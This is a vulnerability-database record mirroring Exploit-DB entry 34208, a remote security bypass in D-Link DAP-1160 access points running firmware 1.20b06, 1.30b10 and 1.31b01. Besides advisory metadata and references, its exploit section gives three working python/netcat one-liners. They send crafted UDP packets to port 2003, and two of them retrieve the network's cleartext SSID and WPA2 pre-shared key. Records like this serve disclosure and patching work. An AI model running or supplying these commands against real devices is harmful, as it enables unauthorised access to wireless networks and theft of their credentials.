Details of VAR-E-201006-0329

ID

VAR-E-201006-0329

EDB ID

34208

TITLE

D-Link DAP-1160 Wireless Access Point - DCC Protocol Security Bypass - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 34208

DESCRIPTION

D-Link DAP-1160 Wireless Access Point - DCC Protocol Security Bypass.. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 34208

AFFECTED PRODUCTS

vendor:	d link	model:	dap-1160 wireless access point	scope:	-	version:	-	Trust: 1.0
vendor:	d link	model:	dap-1160 1.31b01	scope:	-	version:	-	Trust: 0.3
vendor:	d link	model:	dap-1160 1.30b10	scope:	-	version:	-	Trust: 0.3
vendor:	d link	model:	dap-1160 1.20b06	scope:	-	version:	-	Trust: 0.3
vendor:	d link	model:	dap-1160	scope:	eq	version:	0	Trust: 0.3

sources: BID: 41187 // EXPLOIT-DB: 34208

EXPLOIT

source: https://www.securityfocus.com/bid/41187/info

The D-Link DAP-1160 wireless access point (WAP) is prone to a security-bypass vulnerability.

Remote attackers can exploit this issue to bypass security restrictions, access certain administrative functions, alter configuration, or trigger a denial-of-service condition.

D-Link DAP-1160 running firmware v120b06, v130b10, and v131b01 are vulnerable.

python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003

python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003
cat ssid.txt
(cleartext SSID displayed after "21 27 xx xx" in the received datagram)

python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003
cat pass.txt
(cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram)

Trust: 1.0

sources: EXPLOIT-DB: 34208

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 34208

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 34208

TYPE

DCC Protocol Security Bypass

Trust: 1.0

sources: EXPLOIT-DB: 34208

CREDITS

Cristofaro Mune

Trust: 0.6

sources: EXPLOIT-DB: 34208

EXTERNAL IDS

db:	BID	id:	41187	Trust: 1.9
db:	EXPLOIT-DB	id:	34208	Trust: 1.6
db:	EDBNET	id:	55567	Trust: 0.6

sources: BID: 41187 // EXPLOIT-DB: 34208 // EDBNET: 55567

REFERENCES

url:	https://www.securityfocus.com/bid/41187/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/34208/	Trust: 0.6
url:	http://www.dlink.com/	Trust: 0.3

sources: BID: 41187 // EXPLOIT-DB: 34208 // EDBNET: 55567

SOURCES

db:	BID	id:	41187
db:	EXPLOIT-DB	id:	34208
db:	EDBNET	id:	55567

LAST UPDATE DATE

2022-07-27T09:16:29.151000+00:00

SOURCES UPDATE DATE

db:

BID

id:

41187

date:

2010-06-28T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	41187	date:	2010-06-28T00:00:00
db:	EXPLOIT-DB	id:	34208	date:	2010-06-28T00:00:00
db:	EDBNET	id:	55567	date:	2010-06-28T00:00:00